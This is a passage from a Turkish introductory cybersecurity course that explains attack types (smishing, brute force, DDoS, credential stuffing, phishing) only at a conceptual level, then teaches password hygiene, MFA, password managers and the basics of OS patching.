Smishing, SMS üzerinden sahte link veya yönlendirmeyle bilgi toplama veya giriş yaptırma girişimidir. "Kargonuz teslim edilemedi, linkten adres güncelleyin" SMS'i tipik örnektir. Mobilde linke tıklama davranışı daha hızlı ve düşünmeden gerçekleşebilir.

İleri referans (Modül 3): Sosyal mühendislik çoğu zaman parolayı veya doğrulama kodunu hedefler. Parola güvenliği ve MFA bu saldırıların etkisini azaltmada kritik rol oynar.

3.3 Kaba Kuvvet (Brute Force) Saldırıları

Zayıf parolalar brute force saldırılarına karşı savunmasızdır.

Kaba kuvvet saldırısı, doğru şifre, anahtar veya PIN bulunana kadar çok sayıda kombinasyonu deneme-yanılma ile denemektir. Zayıf, tahmini kolay veya tekrar kullanılan şifreler teknik açık olmasa bile hesapların ele geçirilmesine yol açabilir. "123456" veya "şifre123" gibi sık kullanılan parola listeleriyle otomatik giriş denemeleri tipik örnektir. Giriş ekranları, uzaktan erişim servisleri ve web panelleri yaygın hedeflerdir. Modül 1'deki "Zayıf şifre = zafiyet" denklemi burada doğrudan karşımıza çıkar. Koruma yöntemleri Modül 3'te ele alınacaktır.

3.4 DoS ve DDoS Saldırıları

Hizmet engelleme: kaynak tüketimi ve botnet ile dağıtık saldırı.

DoS ve DDoS saldırıları, bir hizmetin kaynaklarını (işlemci, bellek, bant genişliği) tüketerek onu erişilemez hale getirmeyi amaçlayan hizmet engelleme saldırılarıdır. DoS tek bir kaynaktan veya sınırlı kaynaktan yapılır; DDoS ise dünya genelinde çok sayıda ele geçirilmiş cihazdan (botnet) aynı anda yapılır. Modül 1'deki CIA üçlüsünün erişilebilirlik ilkesini doğrudan hedef alır. Hizmet kesintisi iş kaybı ve itibar kaybına yol açabilir. Bir web sitesine aynı anda çok sayıda istek gönderildiğinde sitenin yanıt veremez hale gelmesi tipik örnektir. DDoS çoğunlukla gizlilik ya da bütünlük değil, erişilebilirlik problemidir.

4) Basit Saldırı Senaryolarını Kavramsal Çözümleme (Teorik)

Bu bölüm “nasıl yapılır?” düzeyinde operasyonel talimat vermez; olayları doğru okumayı öğretir.

Senaryo çözümleme şablonu

1. Hedef varlık: Veri mi, sistem mi, hizmet mi?

2. Aktör: Kim olabilir? (script kiddie, suç grubu, iç tehdit vb.)

3. Zafiyet: Neyden yararlanıldı? (zayıf parola, yanlış izin, güncellenmemiş sistem, kandırılan kullanıcı)

4. Yöntem: Hangi saldırı türü? (phishing, brute force, malware, DDoS vb.)

5. Etki (CIA): Gizlilik mi, bütünlük mü, erişilebilirlik mi etkilendi?

Mini senaryo 1

Bir çevrimiçi randevu hizmeti belirli saatlerde sık sık yanıt veremez hale geliyor. İncelemede yoğun ve anormal trafik görülüyor.

• Varlık: Hizmet

• Muhtemel yöntem: DDoS

• Etki: Erişilebilirlik

• Not: CIA çerçevesinde bu bir “erişilebilirlik ihlali”dir.

Mini senaryo 2

Bir kullanıcı “hesabınız doğrulanmazsa kapanacak” e-postasına tıklayıp giriş bilgilerini giriyor; kısa süre sonra hesabında izinsiz giriş denemeleri başlıyor.

• Varlık: Hesap ve hesap içindeki veri

• Muhtemel yöntem: Phishing + hesap ele geçirme girişimi

• Etki: Gizlilik riski (hesaba erişim) ve bütünlük riski (ayarların değiştirilmesi)

• Not: Parola tekrarını önleme ve MFA’nın önemi Modül 3’te daha netleşir.

Terimler Sözlüğü

• Threat Actor (Tehdit aktörü): Saldırıyı yapan kişi/grup veya iç/dış unsur

• Script Kiddie: Hazır araçlarla saldırı deneyen, teknik derinliği sınırlı kişi

• Hacktivist: İdeolojik/sosyal mesaj amacıyla dijital eylem yapan kişi/grup

• Cybercrime Organization (Siber suç örgütü): Maddi kazanç odaklı organize grup

• APT (Advanced Persistent Threat): Belirli hedefe yönelik, uzun süreli ve karmaşık; “gelişmiş kalıcı tehdit” yaklaşımı

• Insider Threat (İç tehdit): Kurum içinden gelen kasıtlı/kazara risk

• Malware: Zararlı yazılımların genel adı

• Payload: Saldırının hedefte asıl etkiyi (yıkıcı/zararlı işi) icra eden kod/bileşen

• Virus (Virüs): Dosyaya bulaşıp, dosya çalıştırılınca etkinleşebilen zararlı yazılım

• Worm (Solucan): Ağ üzerinden otomatik yayılabilen zararlı yazılım

• Trojan (Truva atı): Masum görünüp arka planda zararlı iş yapan; bazen backdoor açabilen yazılım

• Backdoor (Arka kapı): Güvenlik kontrollerini atlayarak sisteme girişi sağlayan gizli geçit

• Ransomware (Fidye yazılımı): Verileri şifreleyip erişimi engelleyerek fidye talep eden malware türü

• Spyware (Casus yazılım): Kullanıcıdan habersiz bilgi toplayan yazılım

• Keylogger: Klavyede basılan tuşları kaydedip saldırgana ileten casus yazılım bileşeni

• Social Engineering (Sosyal mühendislik): İnsanların zayıf noktalarını kullanarak bilgi/erişim elde etme

• Phishing/Vishing/Smishing: E-posta/telefon/SMS üzerinden oltalama

• Brute Force: Deneme-yanılma ile parola/anahtar/PIN kırma yöntemi

• DoS / DDoS: Hizmeti tekil / dağıtık kaynaklarla erişilemez kılma

• Botnet: Saldırganın ele geçirip uzaktan yönettiği “zombi” cihazlar ağı

Bu Modülde Neler Öğrendik?

• Siber tehditlerin tek tip “hacker”dan ibaret olmadığını; ideolojik, finansal ve stratejik motivasyonların farklı aktör profilleri oluşturduğunu öğrendik.

• İç tehditlerin (kasıtlı/kazara) en az dış saldırganlar kadar önemli risk kaynağı olabileceğini kavradık.

• Malware kavramını ve temel türlerini (virüs, worm, trojan, ransomware, spyware; ayrıca backdoor/keylogger gibi alt kavramları) ayırt ettik.

• Güvenlikte insanın zayıf halka olabildiğini; sosyal mühendisliğin güven–korku–acele gibi tetikleyicilerle çalıştığını gördük.

• Brute force ve DoS/DDoS saldırılarının mantığını ve CIA üzerindeki tipik etkilerini (özellikle erişilebilirlik) ilişkilendirdik.

• Basit olayları aktör–zafiyet–yöntem–etki (CIA) şablonuyla kavramsal olarak çözümleyebileceğimizi gördük.

• Modül 1’deki kavramların bu modülde saldırı dünyasına bağlandığını; Modül 3’ün hesap güvenliğiyle bu riskleri azaltmaya odaklanacağını anladık.

Modül 3 — Kimlik, Hesap ve Kullanıcı Güvenliği (Parola, MFA ve Dijital Kimlik)

Bu modül, siber savunmanın en kritik “giriş kapısı” olan kullanıcı kimliği ve hesapların nasıl korunacağını başlangıç seviyesinde, sistematik biçimde ele alır. Dijital kimliğin nasıl temsil edildiği; kimlik bildirimi (identification), kimlik doğrulama (authentication) ve yetkilendirme (authorization) arasındaki farklar netleştirilir. Ardından parola güvenliği (güçlü parola/passphrase, entropi, parola hijyeni), hesap ele geçirme riskleri (brute force, dictionary attack, credential stuffing, phishing) ve bunlara karşı en etkili katmanlardan biri olan Çok Faktörlü Kimlik Doğrulama (MFA) açıklanır. Önceki modüldeki saldırı türleriyle (özellikle phishing ve brute force) doğrudan bağ kurulur; bir sonraki modülde ise bu kimlik mekanizmalarının üzerinde çalıştığı ortamın (işletim sistemi, yazılım ve tarayıcı güvenliği) nasıl güçlendirileceği incelenecektir.

Modül Amaçları

Bu modülü tamamlayan bir öğrenci:

• Dijital kimlik, kimlik bildirimi (identification), kimlik doğrulama (authentication) ve yetkilendirme (authorization) kavramlarını ayırt edip ilişkilendirebilir.

• Parola güvenliğinin temel prensiplerini açıklayabilir; güçlü parola/passphrase tasarlayabilir ve “parola entropisi” kavramını yorumlayabilir.

• Brute force, dictionary attack, credential stuffing ve phishing gibi saldırıların hesap güvenliğini nasıl etkilediğini analiz edebilir.

• MFA yöntemlerini (SMS/çağrı OTP, uygulama tabanlı TOTP, donanım güvenlik anahtarı, biyometrik) tanıyıp artı/eksi yönlerini değerlendirebilir.

• Parola yöneticilerinin çalışma prensibini, “ana parola (master password)” mantığını ve güvenlik avantajlarını savunabilir.

• Hesap güvenliği için uygulanabilir bir “asgari güvenlik kontrol listesi” oluşturup basit senaryolara uyarlayabilir.

1) Büyük Resim: Neden Kimlik ve Hesap Güvenliği Kritik?

Önceki modülde tehdit aktörlerinin en sık hedef aldığı alanlardan birinin kullanıcı hesapları olduğunu gördünüz. Bunun temel nedeni şudur: Hesaplar erişimin anahtarıdır. Bir hesabın ele geçirilmesi, saldırgana sistem içinde “meşru kullanıcı gibi” hareket etme imkânı verir. Bu durum, saldırganın ağ içinde fark edilmeden ilerlemesini (lateral movement / yanal hareket) kolaylaştırabilir.

İnsan faktörü de bu resmi büyütür: zayıf parola seçmek, aynı parolayı birden fazla yerde kullanmak, doğrulama kodunu paylaşmak, “aceleyle linke tıklamak” gibi davranışlar teknik bir açık olmadan bile güvenlik zafiyeti yaratabilir.

• Geri referans (Modül 2): Phishing/vishing/smishing ve brute force gibi saldırılar doğrudan hesapları hedef alır.

• İleri referans (Modül 4): Hesap güvenliği güçlü olsa bile, güncellenmemiş yazılımlar veya kötü yapılandırılmış işletim sistemleri yeni zafiyetler doğurabilir. Bir sonraki modülde “güvenli yapılandırma + güncelleme” yaklaşımının hesap güvenliğini nasıl tamamladığını göreceksiniz.

2) Dijital Kimlik ve Temel Kavramlar

2.1 Dijital Kimlik (Digital Identity)

Bir kişi/sistem/servisin dijital ortamda “kim olduğunu” temsil eden veri ve özelliklerin bütünüdür (kullanıcı adı, e-posta, cihaz kimliği, rol bilgisi gibi). Sistemlerin “kime, neye, ne kadar yetki verileceği” kararının temelidir. Örneğin bir e-öğrenme sitesinde ogrenci_ayse hesabı yalnızca ders içeriklerini görür; egitmen_mert hesabı içerik ekleyebilir. Günlük hayatta e-posta hesapları, sosyal medya, bankacılık uygulamaları, üniversite bilgi sistemleri, şirket içi paneller.

2.2 Kimlik Bildirimi (Identification), Kimlik Doğrulama (Authentication) ve Yetkilendirme (Authorization)

Bu üç kavram sık karıştırılır; oysa teknik işleyişleri farklıdır:

2.2.1 Kimlik Bildirimi (Identification)

Kimlik bildirimi, kullanıcının sisteme “Ben kimim?“ demesidir. Genellikle kullanıcı adı veya e-posta ile yapılır. Sisteme hangi kimliğin işlem yaptığını söylemeden doğrulama başlatılamaz. Örneğin giriş ekranına mert@example.com yazmak. Kullanıcı adı, e-posta veya telefon numarası girilen tüm giriş ekranları günlük hayatta karşılaşılan örneklerdir.

2.2.2 Kimlik Doğrulama (Authentication)

Sistemin “Gerçekten iddia ettiğin kişi misin?” sorusuna kanıt istemesidir. Zayıf doğrulama, saldırganın başkasının hesabına “o kişiymiş gibi” girmesine yol açar. Örneğin Kullanıcı adı + parola ile giriş yapmak. Günlük hayatta parola, SMS kodu, doğrulayıcı uygulama kodu, parmak izi/yüz tanıma.

Kimlik doğrulama faktörleri (3 temel kategori):

• Bildiğin bir şey: parola, PIN

• Sahip olduğun bir şey: telefon, donanım güvenlik anahtarı

• Olduğun bir şey: parmak izi, yüz, iris

Bu sınıflandırma, MFA’nın mantığını anlamanın temelidir.

2.2.3 Yetkilendirme (Authorization)

Yetkilendirme, doğrulama sonrası “Girdiysen ne yapmaya yetkilisin?“ sorusunun cevabıdır. Doğrulama doğru olsa bile yetkilendirme yanlışsa gereğinden fazla erişim (veri sızıntısı, izinsiz değişiklik) oluşabilir. Örneğin bir öğrencinin “notları güncelleme“ ekranını görmemesi, bu ekranın sadece öğretmene açık olması tipik bir yetkilendirme örneğidir. Yönetici paneli yetkileri, dosya paylaşım izinleri ve sistem rolleri günlük hayatta sık karşılaşılan yetkilendirme uygulamalarıdır.

Akademik benzetme : Üniversite kütüphanesi

• Öğrencinin numarasını söylemesi → Kimlik Bildirimi

• Öğrenci kartını göstermesi → Kimlik Doğrulama

• Sadece “Genel Okuma” salonuna izin verilip “Nadir Eserler” odasına izin verilmemesi → Yetkilendirme

2.3 En Az Ayrıcalık İlkesi (Least Privilege) ve RBAC

En az ayrıcalık ilkesi, bir kullanıcıya veya sisteme yalnızca işini yapmak için gereken minimum yetkilerin verilmesidir. Hesap ele geçirilse bile saldırganın yapabileceklerini sınırlar; riskin etki kısmını düşürür. Örneğin stajyer hesabına "kullanıcı oluşturma/silme" yetkisi verilmemesi tipik bir uygulamadır. Rol tabanlı erişim kontrolü (RBAC), dosya ve dizin izinleri ile yönetici haklarının sınırlandırılması günlük hayatta sık karşılaşılan örneklerdir.

Geri referans (Modül 1): Risk (olasılık × etki) açısından, en az ayrıcalık ilkesi özellikle etkiyi azaltır. Bir sonraki modülde, işletim sistemi ve uygulama yapılandırmalarında "gereksiz yetkileri kapatma" yaklaşımıyla least privilege'in nasıl teknik olarak desteklendiğini göreceksiniz.

3) Parola Güvenliği: Temel İlkeler, Passphrase ve Entropi

3.1 Parola Nedir ve Neden Zafiyet Olabilir?

Parola, hesaba girişte kullanılan gizli ifadedir (parola veya PIN). En yaygın doğrulama yöntemi olduğu için saldırganların ilk denediği kapıdır. "123456" gibi zayıf parolalar çok hızlı tahmin edilebilir. Web hesapları, bilgisayar oturumları, modem arayüzleri ve e-posta gibi alanlarda günlük hayatta sık karşılaşırız.

Geri referans (Modül 2): Brute force saldırıları parolayı hedefler; sosyal mühendislik ise parolayı kullanıcıdan "aldırmaya" çalışır.

3.2 Güçlü Parola ve Parola İfadesi (Passphrase)

Güçlü parola, tahmin edilmesi zor, yeterince uzun ve benzersiz paroladır. Passphrase ise birden fazla kelimeden oluşan daha uzun ifadedir; genellikle daha akılda kalıcı ve dayanıklıdır. Özellikle uzunluk parola tahmin saldırılarına karşı direnci ciddi artırır. NIST rehberleri de kullanıcıların uzun parolalar ve passphrase kullanabilmesini destekleyecek şekilde doğrulayıcıların uzun girişlere izin vermesini vurgular. Zayıf örnek: Mert123. Daha güçlü örnek: Mavi-Kitap-Bulut-78 (uzun ve daha yüksek çeşitlilik). Kurumsal parola politikaları, kritik sistem girişleri ve e-posta hesapları günlük hayatta sık karşılaşılan uygulama alanlarıdır.

3.3 Parola Entropisi (Entropy) ve “Tahmin Edilemezlik”

Entropi, parolanın rastgelelik ve tahmin edilemezlik derecesini ifade eden bir güç ölçüsüdür. Entropisi düşük parolalar saldırganların tahmin listelerinde yer alır ve hızlı kırılabilir. P@ssw0rd123 karmaşık görünse bile çok yaygın kalıplara benzediği için zayıf olabilir; buna karşılık rastgele seçilmiş birkaç kelime ile sayı içeren bir passphrase daha dayanıklı olma eğilimindedir. Parola politikaları, parola denetleyicileri ve parola kırma denemelerinde kullanılan sık parola listeleri günlük hayatta entropi kavramının uygulandığı alanlardır.

3.4 Parola Hijyeni: “Ne Yapmalıyım?”

Aşağıdaki alışkanlıklar başlangıç seviyesinde uygulanabilir ve yüksek etkilidir:

1. Her hesap için benzersiz parola kullanın. Bir sızıntıda ortaya çıkan parola başka platformlarda otomatik denenebilir (credential stuffing); bu yüzden her hesap için farklı parola kullanmak kritiktir.

2. Parola yöneticisi (Password Manager) kullanmayı değerlendirin. Parola yöneticileri parolaları şifreli bir kasada saklar ve her site için güçlü parola üretir. "30 hesap → 30 farklı güçlü parola" yönetimini pratik hale getirir. Kullanıcı yalnızca bir ana parola (master password) ezberler; diğer parolalar kasada saklanır.

3. Güvenlik sorularını da parola gibi düşünün. "Annenizin kızlık soyadı" gibi bilgiler sosyal mühendislikle tahmin edilebilir. Güvenlik sorusuna gerçek cevap yerine rastgele bir ifade belirleyip kasada saklamak daha güvenlidir.

4. Parola paylaşmayın; yazılı notlara dikkat edin. İç tehdit (kasıtlı veya kazara) riskini artırır. Parolayı monitöre yapıştırmak gibi alışkanlıklardan kaçının.

4) Hesap Ele Geçirme Saldırıları: Nasıl Çalışır?

4.1 Brute Force (Kaba Kuvvet)

Doğru parola/PIN’i bulana kadar çok sayıda deneme yapmak. Zayıf parolalar, basit PIN’ler ve deneme sınırı olmayan sistemler risklidir. Örneğin 4 haneli PIN için 0000–9999 aralığını sistematik denemek. Günlük hayatta giriş sayfaları, uzaktan erişim servisleri, yönetim panelleri.

Savunmaya giriş (kavramsal): deneme sınırı, hesap kilidi, hız sınırlama (rate limiting) ve MFA brute force etkisini azaltır.

• İleri referans (Modül 4): Rate limiting ve kilitleme gibi kontroller çoğu zaman uygulama/altyapı yapılandırması gerektirir; bir sonraki modülde “güvenli yapılandırma” ile bağını kuracağız.

4.2 Dictionary Attack (Sözlük Saldırısı)

Parola tahmininde, olası parolaları “önceden hazırlanmış kelime/parola listelerinden” seçip denemektir. İnsanlar sık kullanılan kelimelere, kalıplara ve tahmin edilebilir varyasyonlara yönelir; bu listeler saldırgan için “kısa yol” olur. Örneğin password, qwerty, admin, SehirAdi2026 gibi kalıpları ve küçük varyasyonlarını denemek. Günlük hayatta yaygın parola listeleriyle yapılan otomatik denemelerde.

Genellikle dictionary attack, parola tahmin saldırılarının (genel anlamda kaba kuvvet/guessing yaklaşımının) pratik bir varyasyonu olarak değerlendirilir.

4.3 Credential Stuffing (Kimlik Bilgisi Doldurma)

Daha önce sızdırılmış kullanıcı adı–parola çiftlerinin başka sitelerde otomatik denenmesi. Parola tekrar kullanımı varsa tek bir sızıntı domino etkisi yaratır. Örneğin bir forum sitesindeki parolası sızan kişinin, aynı parola ile e-posta hesabının ele geçirilmesi. Günlük hayatta büyük veri ihlalleri sonrası toplu hesap ele geçirme dalgaları.

Senaryo : kullanici@example.com adresiyle bir foruma üye olan bir kişi, forumun veri ihlali yaşamasıyla parola sızıntısına maruz kalır. Saldırganlar aynı e-posta+parola ikilisini botlarla farklı hizmetlerde dener. Bu davranış credential stuffing’in özüdür.

4.4 Phishing ile Hesap Ele Geçirme

Phishing, sahte bir sayfa veya mesajla kullanıcıdan giriş bilgilerini almak veya kullanıcıyı işlem yapmaya zorlamaktır. Parola ne kadar güçlü olursa olsun, kullanıcı kandırılıp parolasını saldırgana verirse hesap riske girer. Örneğin "Hesabınız askıya alındı" e-postasıyla login.example.net gibi sahte bir giriş sayfasına yönlendirilip parolanın girilmesi tipik bir phishing senaryosudur. E-posta oltalaması, SMS linkleri, sosyal medya mesajları ve "destek ekibi" kılığında aramalar günlük hayatta sık karşılaşılan örneklerdir.

Geri referans (Modül 2): Phishing, vishing ve smishing kanalları burada doğrudan hesap ele geçirme sonucuna bağlanır.

İleri referans (Modül 4): Tarayıcı güvenliği, güncelleme ve zararlı eklentiler gibi konular phishing sonrası riskleri büyütebilir; bir sonraki modülde bu bağlantıyı netleştireceğiz.

5) MFA: Hesap Güvenliğinin Çarpanı

5.1 MFA Nedir?

Giriş sırasında iki veya daha fazla doğrulama faktörü kullanılmasıdır (ör. parola + tek kullanımlık kod). Parola sızsa bile saldırganın giriş yapmasını zorlaştırır; özellikle phishing ve credential stuffing etkisini azaltır. CISA, MFA’nın hesap ele geçirmeyi azaltmada kritik bir kontrol olduğunu vurgular. Örneğin parola doğru girilse bile telefondaki doğrulayıcı uygulamanın ürettiği 6 haneli kod istenir. Günlük hayatta e-posta sağlayıcıları, bankacılık uygulamaları, kurumsal paneller.

5.2 Yaygın MFA Yöntemleri

a) SMS/Çağrı ile OTP

Telefona SMS veya arama ile gelen tek kullanımlık kod. Parola tek başına olmaktan daha güvenlidir; ancak en güçlü seçenek değildir. Örneğin girişte SMS ile gelen 482913 kodunu girmek. Günlük hayatta bazı banka doğrulamaları ve sosyal medya girişleri.

b) Uygulama Tabanlı Doğrulayıcı (Authenticator App, TOTP)

Telefonda çalışan uygulamanın zaman tabanlı tek kullanımlık kod üretmesi (TOTP). SMS kanalına bağlı bazı riskleri azaltır; daha kontrollü bir doğrulama sunar. Örneğin Her 30 saniyede değişen kodu giriş ekranına yazmak. Günlük hayatta kurumsal hesaplar, e-posta hesapları, geliştirici platformları.

c) Donanım Güvenlik Anahtarı (Hardware Security Key)

USB/NFC gibi fiziksel bir cihazla doğrulama. Phishing’e karşı daha dirençli çözümler sağlayabilir. Örneğin girişte USB anahtarı takıp onay vermek. Günlük hayatta kritik kurumsal ve yönetici hesaplarında.

d) Biyometrik Doğrulama (Biometrics)

“Olduğun bir şey” faktörü; parmak izi/yüz gibi fiziksel özelliklerle doğrulama. Kullanım kolaylığı yüksektir; özellikle cihaz erişiminde etkilidir. Örneğin Telefonda parmak izi ile kilit açma. Günlük hayatta mobil cihazlar, dizüstü bilgisayarlar, bazı kurumsal kimlik doğrulama akışları.

6) Parola Yöneticileri: Çalışma Prensibi ve Güvenlik Mantığı

Parola yöneticileri, parolaları şifreli bir kasada saklayan ve her site için benzersiz, güçlü parola üretmeye yardımcı olan yazılımlardır. İnsan zihni çok sayıda güçlü parolayı hatırlamakta zorlanır; bu zorluk parola tekrar kullanımı gibi riskli davranışları tetikler. Kullanıcı yalnızca bir ana parola (master password) ezberler; tüm diğer parolalar kasa içinde saklanır ve gerektiğinde otomatik doldurulur. Tarayıcı entegre parola kasaları, kurumsal parola yönetim çözümleri ve bireysel parola kasası uygulamaları günlük hayatta sık karşılaşılan örneklerdir.

7) Hesap Güvenliği İçin Asgari Kontrol Listesi (Pratik Rehber)

Aşağıdaki maddeler başlangıç seviyesinde uygulanabilir ve yüksek etkilidir:

1. Benzersiz ve uzun parola/passphrase kullan.

2. Parola tekrarını bırak; mümkünse parola yöneticisi kullan.

3. MFA’yı etkinleştir (tercihen uygulama tabanlı veya donanım anahtarı).

4. Kurtarma seçeneklerini güvenli tut: kurtarma e-postası/telefonu güncel olsun; recovery codes güvenli yerde saklansın.

5. Şüpheli giriş uyarılarını ciddiye al: beklenmeyen cihaz/konum uyarısında parola değiştir, oturumları kapat.

6. Yetkileri sınırla: her yerde yönetici hesapla dolaşma; least privilege uygula.

7. Deneme sınırı / rate limiting gibi kontrolleri destekle (kullanıcı olarak: hizmetlerin bu kontrolleri sunmasına önem ver).

• Geri referans (Modül 1): Bu kontroller riskin hem olasılığını hem etkisini düşürür.

• İleri referans (Modül 4): Güncelleme ve güvenli yapılandırma, kimlik güvenliğinin tamamlayıcı parçasıdır.

8) Kavramsal Senaryo Çözümleme

Senaryo şablonu (önceki modülle uyumlu):

Mini Senaryo 1

Bir öğrenci, “hesabınız doğrulanmazsa kapanacak” başlıklı e-postaya tıklayıp giriş bilgilerini giriyor. Ardından hesabında tanımadığı bir cihaz oturumu görünüyor.

• Varlık: Hesap ve içindeki veriler

• Muhtemel yöntem: Phishing

• Zafiyet: Sahte sayfayı ayırt edememe, MFA’nın etkin olmaması

• Etki (CIA): Gizlilik riski (hesap içeriğine erişim), bütünlük riski (ayarların değişmesi)

Mini Senaryo 2

Bir kullanıcı aynı parolayı hem bir forumda hem de e-posta hesabında kullanıyor. Forumda veri ihlali yaşandıktan sonra e-posta hesabına farklı ülkelerden giriş denemeleri başlıyor.

• Varlık: E-posta hesabı

• Muhtemel yöntem: Credential stuffing

• Zafiyet: Parola tekrar kullanımı

• Etki (CIA): Gizlilik riski (iletilere erişim), bütünlük riski (hesap ayarlarının değiştirilmesi)

Terimler Sözlüğü (Glossary)

Bu Modülde Neler Öğrendik?

• Dijital kimlik kavramını ve kimlik bildirimi–doğrulama–yetkilendirme ayrımını kurabildik.

• Hesap ele geçirmenin neden “meşru kullanıcı gibi davranma” etkisi yarattığını ve bunun yanal hareketi kolaylaştırabildiğini öğrendik.

• Güçlü parola/passphrase tasarlamanın mantığını; uzunluk, benzersizlik ve entropi ilişkisini kavradık.

• Brute force, dictionary attack, credential stuffing ve phishing’in hesap güvenliğine etkilerini senaryo bazında analiz ettik.

• MFA’nın çalışma mantığını ve doğrulama faktörlerini (bildiğin/sahip olduğun/olduğun) öğrendik; SMS tabanlı yöntemlerin sınırlılıklarını ve daha güçlü alternatifleri değerlendirdik.

• Parola yöneticilerinin “şifreli kasa + ana parola” yaklaşımıyla parola hijyenini nasıl güçlendirdiğini öğrendik.

• Uygulanabilir bir asgari hesap güvenliği kontrol listesi oluşturmayı öğrendik ve bunu risk azaltma mantığıyla ilişkilendirdik.

Modül 4 — İşletim Sistemi, Yazılım ve İnternet/Tarayıcı Güvenliği (Güncelleme, Sıkılaştırma ve Güvenli Kullanım)

Bu modül, kimlik ve hesap güvenliğinin (Modül 3) üzerinde çalıştığı teknik zemini güvenli hale getirmeyi hedefler: işletim sistemi, uygulamalar, uç nokta güvenlik kontrolleri ve web/tarayıcı kullanımı. Güncelleme (patch) ve yama yönetimi, güvenli yapılandırma (hardening/sıkılaştırma), antivirüs ve EDR gibi uç nokta koruma yaklaşımları, lisanslı/güvenilir yazılım edinme, HTTPS ve SSL/TLS ile şifreli iletişim, çerezler ve dijital ayak izi, tarayıcı eklentileri ve indirme güvenliği bu dersin omurgasını oluşturur. Önceki modüllerdeki risk mantığı (Modül 1) ve saldırı türleri (Modül 2) ile doğrudan bağ kurularak, saldırganların pratikte çoğu zaman “güncellenmemiş yazılım + yanlış yapılandırma + kullanıcı hatası” üçlüsünden faydalandığı gösterilir. Bir sonraki modülde ise bu güvenli zeminin ağ üzerinde nasıl genişletileceği; güvenli bağlantı, ağ temelleri ve iletişimin korunmasında şifrelemenin rolü ele alınacaktır.

Modül Amaçları

Bu modülü başarıyla tamamlayan bir öğrenci:

• İşletim sistemi güvenliğinin temel bileşenlerini açıklayabilir; CIA (gizlilik–bütünlük–erişilebilirlik) ile ilişkilendirebilir.

• Zafiyet (vulnerability), hata (bug), exploit ve patch/yama kavramlarının ilişkisini kurabilir; yama yönetiminin neden kritik olduğunu değerlendirebilir.

• Güvenli yapılandırma (hardening/sıkılaştırma) yaklaşımını ve saldırı yüzeyi (attack surface) mantığını temel kontrollerle açıklayabilir.

• Uç nokta (endpoint) güvenliği kapsamında geleneksel antivirüs ile EDR yaklaşımlarının kavramsal farklarını ayırt edebilir; APT ve polimorfizm gibi kavramların neden bu farkı önemli kıldığını yorumlayabilir.

• Yazılım edinme/kurulum süreçlerindeki riskleri (korsan/crack’li yazılım, truva atı, backdoor, tedarik zinciri riski) tanımlayabilir ve güvenli edinme pratiklerini uygulayabilir.

• İnternet ve tarayıcı güvenliğinde HTTP–HTTPS farkını, SSL/TLS’in rolünü, çerezlerin ve dijital ayak izinin etkisini, eklenti/izin yönetimini ve güvenli indirme alışkanlıklarını kullanabilir.

İşletim Sistemi, Yazılım ve Tarayıcı Güvenliği

1) Büyük Resim: “Güvenli Zemin” Neden Önemli?

Önceki modüllerde, saldırıların çoğunun insan ve hesaplar üzerinden başladığını gördünüz (Modül 2–3). Ancak saldırganın hedefte kalıcı etki yaratması, çoğu zaman işletim sistemi ve yazılım katmanındaki açıklıklar veya yanlış yapılandırmalar üzerinden gerçekleşir.

• Bu kavram, önceki bölümdeki risk mantığı ile ilişkilidir (Modül 1): Risk = olasılık × etki. Güncellenmemiş sistemler olasılığı artırır; aşırı yetkiler ve hatalı yapılandırmalar etkiyi büyütür.

• Bu kavram, önceki bölümdeki saldırı türleri ile ilişkilidir (Modül 2): Oltalama (phishing) kullanıcıyı “bir şey indirmeye/çalıştırmaya” ikna edebilir; zararlı yazılım (malware) bu sayede sisteme yerleşebilir.

• Bu kavram, önceki bölümdeki hesap güvenliği ile ilişkilidir (Modül 3): MFA güçlü olsa bile, cihazınıza bulaşan bir casus yazılım (ör. tuş kaydedici) parolanızı veya oturum bilgilerinizi riske atabilir.

• Bir sonraki modülde ağ temellerine geçerken, bu güvenli zeminin ağ üzerinde nasıl tamamlandığını (güvenli Wi-Fi, güvenli bağlantı, temel ağ kontrolleri) göreceksiniz. Aynı zamanda HTTPS/TLS gibi şifreli iletişimin ağda nasıl bir koruma sağladığına “temel düzeyde” bağ kuracağız.

2) İşletim Sistemi Güvenliğine Giriş

2.1 İşletim Sistemi (Operating System, OS) Nedir?

Donanım ile kullanıcı/uygulamalar arasında köprü kuran; işlemci, bellek, disk ve ağ gibi kaynakları yöneten temel yazılımdır. Dijital varlıkların (veri ve sistemlerin) büyük kısmı OS üzerinde barınır. OS katmanındaki zafiyetler geniş etki doğurabilir (veri sızıntısı, sistem ele geçirme, hizmet kesintisi). Örneğin Dosya izinleri verme, kullanıcı hesabı açma ve bir uygulamayı çalıştırma gibi işlemler OS tarafından yönetilir. Günlük hayatta windows, Linux dağıtımları, macOS; mobilde Android/iOS.

2.2 Hata (Bug), Zafiyet (Vulnerability), Exploit ve Patch İlişkisi

Güncelleme ve yama yönetimi — zafiyetleri kapatmanın temel süreci.

Bu dört kavram, güncelleme güvenliğini anlamanın temelidir.

Bug (Hata): Yazılımın beklenmeyen şekilde davranmasına yol açan programlama hatasıdır. Her bug güvenlik açığı değildir; ancak bazı hatalar saldırganın işine yarayacak zafiyete dönüşebilir. Bir uygulamanın belirli bir dosyayı açarken çökmesi tipik örnektir. Uygulama çökmesi, beklenmeyen hata mesajları ve kararsız çalışma günlük hayatta sık görülür.

Vulnerability (Zafiyet): Bir bug'ın veya tasarım/konfigürasyon hatasının saldırgan tarafından istismar edilebilir hale gelmiş biçimidir. Zafiyet, tehdidin saldırıya dönüşmesini kolaylaştırır. Bir belge görüntüleyicide özel hazırlanmış bir dosya ile uzaktan kod çalıştırmaya izin veren açık örnek verilebilir. Güvenlik duyuruları, CVE kayıtları ve üretici yamaları günlük hayatta karşılaşılan kaynaklardır.

Exploit: Bir zafiyeti kullanarak istenmeyen bir sonucu (yetki yükseltme, kod çalıştırma) elde etmeye yarayan yöntem veya uygulamadır. Zafiyetin pratikte saldırıya dönüşmüş halini temsil eder; yama gecikmesi kritik risk üretir. Zafiyetli bir uygulamayı özel hazırlanmış giriş verisiyle çalıştırıp kontrol dışı davranış oluşturmak tipik örnektir. Saldırı raporları, güvenlik test senaryoları ve zararlı kampanyalar günlük hayatta karşılaşılan durumlardır.

